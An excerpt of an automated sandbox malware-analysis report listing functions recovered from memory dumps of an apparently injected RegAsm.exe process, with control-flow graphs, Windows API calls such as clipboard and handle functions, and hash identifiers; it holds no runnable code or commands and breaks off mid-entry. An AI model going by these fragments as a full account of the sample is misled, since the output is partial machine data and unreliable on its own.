                                                control_flow_graph 2263 6d55110-6d55136 2266 6d55166-6d5516e 2263->2266 2267 6d55138-6d55160 call 6d539bc call 6d546d4 2263->2267 2269 6d551b4-6d551fd call 6d546ec 2266->2269 2270 6d55170-6d55175 call 6d546e0 2266->2270 2267->2266 2278 6d5537b-6d553a1 2267->2278 2291 6d55203-6d5524e 2269->2291 2292 6d553a8-6d553da 2269->2292 2275 6d5517a-6d551af 2270->2275 2283 6d55251-6d552b3 call 6d539bc call 6d546f8 2275->2283 2278->2292 2313 6d5536f-6d5537a 2283->2313 2314 6d552b9-6d552c6 2283->2314 2291->2283 2307 6d553e1-6d5542c 2292->2307 2320 6d5542e-6d55435 2307->2320 2321 6d55469-6d5546e 2307->2321 2318 6d552cc-6d552f9 call 6d539bc call 6d546ec 2314->2318 2319 6d5536b-6d5536d 2314->2319 2318->2319 2335 6d552fb-6d55308 2318->2335 2319->2307 2319->2313 2322 6d55437-6d55468 2320->2322 2321->2322 2323 6d5546f-6d55490 2321->2323 2322->2321 2325 6d55492-6d55495 2323->2325 2326 6d55498-6d554c3 GetModuleHandleW 2323->2326 2325->2326 2327 6d554c5-6d554cb 2326->2327 2328 6d554cc-6d554e0 2326->2328 2327->2328 2335->2319 2336 6d5530a-6d55321 call 6d539bc call 6d54704 2335->2336 2341 6d55323-6d5532c call 6d546f8 2336->2341 2342 6d5532e-6d5535d call 6d546f8 2336->2342 2341->2319 2342->2319 2350 6d5535f-6d55369 2342->2350 2350->2319 2350->2342
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700294997.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d50000_RegAsm.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 5dec022dc647fa8286b32340dec8693b96383d7e43a42a7930a075b296d207f6
                                                • Instruction ID: 1c3859e68c4a9c1e097fe3b1ead26619d7bc2f731f285d3009bf8f66bcb93943
                                                • Opcode Fuzzy Hash: 5dec022dc647fa8286b32340dec8693b96383d7e43a42a7930a075b296d207f6
                                                • Instruction Fuzzy Hash: F4C1CE74A007068FDB55EF79D8806AEBBF2FF88210B15852DC81ADB751DB74E846CB90
                                                Function 06D62380 Relevance: 1.0, Instructions: 1031COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 40c6fd547ce028516547f3ab6cf8aadd7a37cf8c032f12763143fbe91d8751fa
                                                • Instruction ID: 1886bd1b35c2da07287454ec06ab43c8cbeb0819aaa92b357a6298bc8f34a887
                                                • Opcode Fuzzy Hash: 40c6fd547ce028516547f3ab6cf8aadd7a37cf8c032f12763143fbe91d8751fa
                                                • Instruction Fuzzy Hash: 26924630E002048FDBA4DB69C588B9DB7F2FB89314F5584A9E419AB365DB35ED85CB80
                                                Function 06D66650 Relevance: .8, Instructions: 832COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6a5a8bf7281ed696191cddb3b681be9baece85c9f9e3c0059574b98c7c8f2bc2
                                                • Instruction ID: 1ba177505378daa82231f1605218a10faf703cf8b6152bbc82d9daa43f850165
                                                • Opcode Fuzzy Hash: 6a5a8bf7281ed696191cddb3b681be9baece85c9f9e3c0059574b98c7c8f2bc2
                                                • Instruction Fuzzy Hash: 98627A34B002449FDB64DB6AD594BADB7F2EB88314F248469E406EB390DB35ED42CB91
                                                Function 06D6C1D8 Relevance: .7, Instructions: 652COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b7bb5ee2ec26aaec72f121d18703e00cbc438e74612756ece131a9a11cad412e
                                                • Instruction ID: 8668a7e5c7c253a409a28c757beb8210bd16c846619adea41c4d74c46dc6303d
                                                • Opcode Fuzzy Hash: b7bb5ee2ec26aaec72f121d18703e00cbc438e74612756ece131a9a11cad412e
                                                • Instruction Fuzzy Hash: A7328F74F102099FDB64DB69E894BADB7B2FB88310F208529E545DB390DB35EC42CB91
                                                Function 06D6B27F Relevance: .6, Instructions: 585COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2dba83aa9ce46cc30f0c04b62894695fe9ba334a941b66c3e2f81970e86b3dba
                                                • Instruction ID: 8fdeb43b1e0b79b850b08b6926c6f860e466f53fac3b9abc16549e26cd8b4d04
                                                • Opcode Fuzzy Hash: 2dba83aa9ce46cc30f0c04b62894695fe9ba334a941b66c3e2f81970e86b3dba
                                                • Instruction Fuzzy Hash: 9A224070F102098FEFA4DB69D4947ADB7E2EB89314F248527F405DB391CA35DC928B91
                                                Function 06D6AD28 Relevance: 10.4, Strings: 8, Instructions: 397COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 6d6ad28-6d6ad46 1 6d6ad48-6d6ad4b 0->1 2 6d6ad5c-6d6ad5f 1->2 3 6d6ad4d-6d6ad51 1->3 6 6d6ad73-6d6ad76 2->6 7 6d6ad61-6d6ad6e 2->7 4 6d6ad57 3->4 5 6d6af54-6d6af5e 3->5 4->2 8 6d6ad86-6d6ad89 6->8 9 6d6ad78-6d6ad81 6->9 7->6 10 6d6ad93-6d6ad96 8->10 11 6d6ad8b-6d6ad90 8->11 9->8 13 6d6adb0-6d6adb3 10->13 14 6d6ad98-6d6ada1 10->14 11->10 17 6d6af45-6d6af4e 13->17 18 6d6adb9-6d6adbc 13->18 15 6d6ada7-6d6adab 14->15 16 6d6af5f-6d6af6c 14->16 15->13 24 6d6af6f-6d6af96 16->24 25 6d6af3d 16->25 17->5 17->14 19 6d6adbe-6d6adda 18->19 20 6d6addf-6d6ade2 18->20 19->20 22 6d6ade4-6d6adf7 20->22 23 6d6adfc-6d6adfe 20->23 22->23 26 6d6ae05-6d6ae08 23->26 27 6d6ae00 23->27 30 6d6af98-6d6af9b 24->30 32 6d6af42 25->32 26->1 31 6d6ae0e-6d6ae32 26->31 27->26 33 6d6af9d-6d6afa7 30->33 34 6d6afa8-6d6afab 30->34 31->32 47 6d6ae38-6d6ae47 31->47 32->17 36 6d6afce-6d6afd1 34->36 37 6d6afad-6d6afc9 34->37 39 6d6afd7-6d6b012 36->39 40 6d6b23a-6d6b23d 36->40 37->36 52 6d6b205-6d6b218 39->52 53 6d6b018-6d6b024 39->53 41 6d6b24e-6d6b251 40->41 42 6d6b23f-6d6b243 40->42 49 6d6b253 call 6d6b27f 41->49 50 6d6b260-6d6b262 41->50 42->39 45 6d6b249 42->45 45->41 60 6d6ae5f-6d6ae9a call 6d66600 47->60 61 6d6ae49-6d6ae4f 47->61 59 6d6b259-6d6b25b 49->59 56 6d6b264 50->56 57 6d6b269-6d6b26c 50->57 54 6d6b21a 52->54 63 6d6b026-6d6b03f 53->63 64 6d6b044-6d6b088 53->64 54->40 56->57 57->30 62 6d6b272-6d6b27c 57->62 59->50 77 6d6aeb2-6d6aec9 60->77 78 6d6ae9c-6d6aea2 60->78 65 6d6ae53-6d6ae55 61->65 66 6d6ae51 61->66 63->54 82 6d6b0a4-6d6b0e3 64->82 83 6d6b08a-6d6b09c 64->83 65->60 66->60 90 6d6aee1-6d6aef2 77->90 91 6d6aecb-6d6aed1 77->91 80 6d6aea6-6d6aea8 78->80 81 6d6aea4 78->81 80->77 81->77 88 6d6b1ca-6d6b1df 82->88 89 6d6b0e9-6d6b1c4 call 6d66600 82->89 83->82 88->52 89->88 99 6d6aef4-6d6aefa 90->99 100 6d6af0a-6d6af3b 90->100 94 6d6aed5-6d6aed7 91->94 95 6d6aed3 91->95 94->90 95->90 102 6d6aefe-6d6af00 99->102 103 6d6aefc 99->103 100->32 102->100 103->100
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $q$$q$$q$$q$$q$$q$$q$$q
                                                • API String ID: 0-3886557441
                                                • Opcode ID: fe8b8a3cd7b8ad2747b89d1eb68f774f5c3778f55cc571d2dc94e4735ed2c967
                                                • Instruction ID: 54692bd02899f99faaea1df02a9d0add656024322a4545e9f47f439102e07910
                                                • Opcode Fuzzy Hash: fe8b8a3cd7b8ad2747b89d1eb68f774f5c3778f55cc571d2dc94e4735ed2c967
                                                • Instruction Fuzzy Hash: 71E17B30F0020A9BDB65DFA9D4846AEB7F2FF89310F24852AE405EB254DB35DC42CB91
                                                Function 06D6B6A8 Relevance: 8.0, Strings: 6, Instructions: 472COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $q$$q$$q$$q$$q$$q
                                                • API String ID: 0-2069967915
                                                • Opcode ID: 904e42401b4f91e41794167d63e134624cf6fd9aa39b336b12b1ba5c270144ae
                                                • Instruction ID: 6a0cb872935b571e9c9ded7b0b16809146b4fea359483b28ae0ec3b704457e7f
                                                • Opcode Fuzzy Hash: 904e42401b4f91e41794167d63e134624cf6fd9aa39b336b12b1ba5c270144ae
                                                • Instruction Fuzzy Hash: 31027C30E102098FDBA4DB6AD484BADB7F1FB85310F24856AE416EB251DB34DD92CB91
                                                Function 06D5A001 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 425 6d5a001-6d5a008 426 6d5a011-6d5a09f GetCurrentProcess 425->426 427 6d5a00a-6d5a00c 425->427 431 6d5a0a1-6d5a0a7 426->431 432 6d5a0a8-6d5a0dc GetCurrentThread 426->432 427->426 431->432 433 6d5a0e5-6d5a119 GetCurrentProcess 432->433 434 6d5a0de-6d5a0e4 432->434 436 6d5a122-6d5a13d call 6d5a1e0 433->436 437 6d5a11b-6d5a121 433->437 434->433 440 6d5a143-6d5a172 GetCurrentThreadId 436->440 437->436 441 6d5a174-6d5a17a 440->441 442 6d5a17b-6d5a1dd 440->442 441->442
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 06D5A08E
                                                • GetCurrentThread.KERNEL32 ref: 06D5A0CB
                                                • GetCurrentProcess.KERNEL32 ref: 06D5A108
                                                • GetCurrentThreadId.KERNEL32 ref: 06D5A161
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700294997.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d50000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 3b1aa5ce949c0c54ee9d74c28bdd42dd43339eed879bb76edcab36d8e25d2c21
                                                • Instruction ID: c51d051a009855b11c62e35596c06fe6d750232754451e9b5c7a77e61afd361e
                                                • Opcode Fuzzy Hash: 3b1aa5ce949c0c54ee9d74c28bdd42dd43339eed879bb76edcab36d8e25d2c21
                                                • Instruction Fuzzy Hash: E65168B0D003498FDB54DFAAD948BDEBBF2BF88314F24855AE409AB350D7349844CB65
                                                Function 06D5A010 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 449 6d5a010-6d5a09f GetCurrentProcess 454 6d5a0a1-6d5a0a7 449->454 455 6d5a0a8-6d5a0dc GetCurrentThread 449->455 454->455 456 6d5a0e5-6d5a119 GetCurrentProcess 455->456 457 6d5a0de-6d5a0e4 455->457 459 6d5a122-6d5a13d call 6d5a1e0 456->459 460 6d5a11b-6d5a121 456->460 457->456 463 6d5a143-6d5a172 GetCurrentThreadId 459->463 460->459 464 6d5a174-6d5a17a 463->464 465 6d5a17b-6d5a1dd 463->465 464->465
                                                APIs
                                                • GetCurrentProcess.KERNEL32 ref: 06D5A08E
                                                • GetCurrentThread.KERNEL32 ref: 06D5A0CB
                                                • GetCurrentProcess.KERNEL32 ref: 06D5A108
                                                • GetCurrentThreadId.KERNEL32 ref: 06D5A161
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700294997.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d50000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Current$ProcessThread
                                                • String ID:
                                                • API String ID: 2063062207-0
                                                • Opcode ID: 924515ad568b95ea74ede60f8e09e7a8129a1d4f790348af8649db4a1ed3187a
                                                • Instruction ID: 70f67f49bcd9ac31988eebe0ff325b85540b40843ed78b0a32e6dba19ec4596d
                                                • Opcode Fuzzy Hash: 924515ad568b95ea74ede60f8e09e7a8129a1d4f790348af8649db4a1ed3187a
                                                • Instruction Fuzzy Hash: A35145B0D003498FDB54DFAAD948B9EBBF2BF88314F248559E409A7350DB34A844CF65
                                                Function 06D691B0 Relevance: 5.2, Strings: 4, Instructions: 230COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 472 6d691b0-6d691d5 473 6d691d7-6d691da 472->473 474 6d691e0-6d691f5 473->474 475 6d69a98-6d69a9b 473->475 481 6d691f7-6d691fd 474->481 482 6d6920d-6d69223 474->482 476 6d69ac1-6d69ac3 475->476 477 6d69a9d-6d69abc 475->477 479 6d69ac5 476->479 480 6d69aca-6d69acd 476->480 477->476 479->480 480->473 484 6d69ad3-6d69add 480->484 485 6d69201-6d69203 481->485 486 6d691ff 481->486 489 6d6922e-6d69230 482->489 485->482 486->482 490 6d69232-6d69238 489->490 491 6d69248-6d692b9 489->491 492 6d6923c-6d6923e 490->492 493 6d6923a 490->493 502 6d692e5-6d69301 491->502 503 6d692bb-6d692de 491->503 492->491 493->491 508 6d69303-6d69326 502->508 509 6d6932d-6d69348 502->509 503->502 508->509 514 6d69373-6d6938e 509->514 515 6d6934a-6d6936c 509->515 520 6d693b3-6d693c1 514->520 521 6d69390-6d693ac 514->521 515->514 522 6d693c3-6d693cc 520->522 523 6d693d1-6d6944b 520->523 521->520 522->484 529 6d6944d-6d6946b 523->529 530 6d69498-6d694ad 523->530 534 6d69487-6d69496 529->534 535 6d6946d-6d6947c 529->535 530->475 534->529 534->530 535->534
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $q$$q$$q$$q
                                                • API String ID: 0-4102054182
                                                • Opcode ID: 6e1a5174649eaf26c2daebd7ccd43078e8b00330469222f6db9fd293664f8daa
                                                • Instruction ID: aeffd4c2b8e16079fa5234e46186236b1fb86a89561bd23c69b1324f5aa1f4ad
                                                • Opcode Fuzzy Hash: 6e1a5174649eaf26c2daebd7ccd43078e8b00330469222f6db9fd293664f8daa
                                                • Instruction Fuzzy Hash: A9916170F1020A9FDB64DB69D8607AE7BF2FF89340F108565D819AB344EA74DD828B91
                                                Function 06D64BC8 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 538 6d64bc8-6d64bec 539 6d64bee-6d64bf1 538->539 540 6d64bf7-6d64cef 539->540 541 6d652d0-6d652d3 539->541 561 6d64cf5-6d64d42 call 6d65470 540->561 562 6d64d72-6d64d79 540->562 542 6d652f4-6d652f6 541->542 543 6d652d5-6d652ef 541->543 544 6d652fd-6d65300 542->544 545 6d652f8 542->545 543->542 544->539 547 6d65306-6d65313 544->547 545->544 575 6d64d48-6d64d64 561->575 563 6d64d7f-6d64def 562->563 564 6d64dfd-6d64e06 562->564 581 6d64df1 563->581 582 6d64dfa 563->582 564->547 578 6d64d66 575->578 579 6d64d6f 575->579 578->579 579->562 581->582 582->564
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: fq$XPq$\Oq
                                                • API String ID: 0-132346853
                                                • Opcode ID: d62b983173326be1243a430b562a876e2d068f1bc66c5cdcc314155256f34538
                                                • Instruction ID: 69409db1e449051adaae103306cdbd6ae6c9ad0ca6ac0845e791eff0e2215483
                                                • Opcode Fuzzy Hash: d62b983173326be1243a430b562a876e2d068f1bc66c5cdcc314155256f34538
                                                • Instruction Fuzzy Hash: F3617F70F002099FEB549BA9D8147AEBBF2FFC9700F208429E106AB395DA758C45CF91
                                                Function 06D691A0 Relevance: 2.7, Strings: 2, Instructions: 164COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1432 6d691a0-6d691d5 1434 6d691d7-6d691da 1432->1434 1435 6d691e0-6d691f5 1434->1435 1436 6d69a98-6d69a9b 1434->1436 1442 6d691f7-6d691fd 1435->1442 1443 6d6920d-6d69223 1435->1443 1437 6d69ac1-6d69ac3 1436->1437 1438 6d69a9d-6d69abc 1436->1438 1440 6d69ac5 1437->1440 1441 6d69aca-6d69acd 1437->1441 1438->1437 1440->1441 1441->1434 1445 6d69ad3-6d69add 1441->1445 1446 6d69201-6d69203 1442->1446 1447 6d691ff 1442->1447 1450 6d6922e-6d69230 1443->1450 1446->1443 1447->1443 1451 6d69232-6d69238 1450->1451 1452 6d69248-6d692b9 1450->1452 1453 6d6923c-6d6923e 1451->1453 1454 6d6923a 1451->1454 1463 6d692e5-6d69301 1452->1463 1464 6d692bb-6d692de 1452->1464 1453->1452 1454->1452 1469 6d69303-6d69326 1463->1469 1470 6d6932d-6d69348 1463->1470 1464->1463 1469->1470 1475 6d69373-6d6938e 1470->1475 1476 6d6934a-6d6936c 1470->1476 1481 6d693b3-6d693c1 1475->1481 1482 6d69390-6d693ac 1475->1482 1476->1475 1483 6d693c3-6d693cc 1481->1483 1484 6d693d1-6d6944b 1481->1484 1482->1481 1483->1445 1490 6d6944d-6d6946b 1484->1490 1491 6d69498-6d694ad 1484->1491 1495 6d69487-6d69496 1490->1495 1496 6d6946d-6d6947c 1490->1496 1491->1436 1495->1490 1495->1491 1496->1495
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700408844.0000000006D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d60000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $q$$q
                                                • API String ID: 0-3126353813
                                                • Opcode ID: 125d51d9278aa599b2b336dacf5ed38671a0f6d94561560899fbfd8eea1f5ca0
                                                • Instruction ID: c2b53a40d5314fcb5602e6a4ae353b36cbd570231101e06032334cfd35d8f26e
                                                • Opcode Fuzzy Hash: 125d51d9278aa599b2b336dacf5ed38671a0f6d94561560899fbfd8eea1f5ca0
                                                • Instruction Fuzzy Hash: 65516070B102059FDB64DB79E860BAE7BE2FF88380F108569D819DB344EA74DD428B91
                                                Function 06D564A2 Relevance: 1.6, APIs: 1, Instructions: 150COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700294997.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d50000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f9f1526ede9ef38350e584f78089ba5246e194183aa9995079a9b517c46757d0
                                                • Instruction ID: e9484a721ef34b720921662bd95bc1a7309b0e1d2b037c6044ae2e21d3cb04ea
                                                • Opcode Fuzzy Hash: f9f1526ede9ef38350e584f78089ba5246e194183aa9995079a9b517c46757d0
                                                • Instruction Fuzzy Hash: B851FFB1C00248AFDF55CFA9C880ADEBFB5BF49310F55816AE818AB221D7319855CF91
                                                Function 015EE933 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3677904770.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_15e0000_RegAsm.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 414262044f6b2e783f2734e1f793c3241c2bd0ff964e7e8e08bc2a787d179b11
                                                • Instruction ID: 491f106fc9f4897af6b9372573264059276e93c0c52a2c7f2f0b20d7e5908462
                                                • Opcode Fuzzy Hash: 414262044f6b2e783f2734e1f793c3241c2bd0ff964e7e8e08bc2a787d179b11
                                                • Instruction Fuzzy Hash: 26414472D043999FDB14CFA9D8047AEBBF5EFC9210F15866AD504A7240DB349845CBE0
                                                Function 06D564EC Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06D5660A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700294997.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d50000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 4eebaf7060524c5f4663e9c1632c93e3357307e2e3b962af811c6a8e67ad11c9
                                                • Instruction ID: c669a6b067add4c1eadddb952cdd27dbf0a4c9afa0871c508be2a2e90ec61f3a
                                                • Opcode Fuzzy Hash: 4eebaf7060524c5f4663e9c1632c93e3357307e2e3b962af811c6a8e67ad11c9
                                                • Instruction Fuzzy Hash: 8351C0B1D003489FDF14CFAAD884ADEBFB5BF48310F65852AE819AB210D775A845CF94
                                                Function 06D564F8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06D5660A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700294997.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d50000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: c62d4a4044b485788d469d087fff6a4579756d0618633adca1746b8c45fe393b
                                                • Instruction ID: 16067a2d23cfd2b935b1c31c7f646f41c86812af4cfdb20ab8a27c0c9616c14f
                                                • Opcode Fuzzy Hash: c62d4a4044b485788d469d087fff6a4579756d0618633adca1746b8c45fe393b
                                                • Instruction Fuzzy Hash: 9541BDB1D003499FDF14CFAAC884ADEBBB5FF48314F65812AE819AB210D775A845CF94
                                                Function 06D59E0C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                Download Yara Rule
                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 06D5B1A9
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700294997.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d50000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: 9f91fb535e3c2f9a8d1fb12ea08e362fcc149a5c99c091e3597cc8e654c29e66
                                                • Instruction ID: 657c5e58542862f4696d981fa39d9dd4b6798b6c72e634ace5872b108748ae3d
                                                • Opcode Fuzzy Hash: 9f91fb535e3c2f9a8d1fb12ea08e362fcc149a5c99c091e3597cc8e654c29e66
                                                • Instruction Fuzzy Hash: DA4149B5900305CFDB54CF99C858EAABBF5FB88314F25C45AE919AB720C774A841CFA0
                                                Function 06D5A250 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06D5A2DF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700294997.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d50000_RegAsm.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 4c7ae37580148481d3cf6d502723f8f1f29ce283cf6a7dbb98a4667b76a83d53
                                                • Instruction ID: 17318428954572159b2142ffa995df2cf89c2e94607131df56ea74a3cac72187
                                                • Opcode Fuzzy Hash: 4c7ae37580148481d3cf6d502723f8f1f29ce283cf6a7dbb98a4667b76a83d53
                                                • Instruction Fuzzy Hash: 553148B6D002189FDB10CFAAD884ADEBFF4FB48324F14802AE914A7350C735A945CFA4
                                                Function 06D5BE2D Relevance: 1.6, APIs: 1, Instructions: 76comclipboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700294997.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d50000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Clipboard
                                                • String ID:
                                                • API String ID: 220874293-0
                                                • Opcode ID: 6663c9085606473c381a4a00f4beef7fce7f51109dbd37fdaa72184ecd59d364
                                                • Instruction ID: 17025b472f07c37eb019f9683a7e9f5c36180d7b85a3ad8f5c1271f74e6053ab
                                                • Opcode Fuzzy Hash: 6663c9085606473c381a4a00f4beef7fce7f51109dbd37fdaa72184ecd59d364
                                                • Instruction Fuzzy Hash: 853102B0D01248DFDB64CF99C994BCDBBF5BF48314F24845AE404AB290C7B5A845CF65
                                                Function 06D5BE38 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700294997.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d50000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Clipboard
                                                • String ID:
                                                • API String ID: 220874293-0
                                                • Opcode ID: 28c5619655eb0a4bccd49c0578d6819d40c9864f1c720ef899b800221e7bb98a
                                                • Instruction ID: 77631ca53c8d57269d6706ef0d8b61a441bac100df9687561ec70daca9abf870
                                                • Opcode Fuzzy Hash: 28c5619655eb0a4bccd49c0578d6819d40c9864f1c720ef899b800221e7bb98a
                                                • Instruction Fuzzy Hash: E83100B0D01248DFEB24CF99C994B8EBBF5BB48304F24806AE404AB290C7B5A845CF65
                                                Function 06D5A258 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                Download Yara Rule
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06D5A2DF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.3700294997.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6d50000_RegAsm.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 3c9acfd9d5d7e9607c7b8274864ba3a8274a276b6eb0d651a4148189e78577f3
                                                • Instruction ID: 6e69780f690f22019190efbe874fcdf399af0b8e7e0e286161d5a6ae5afebd3f
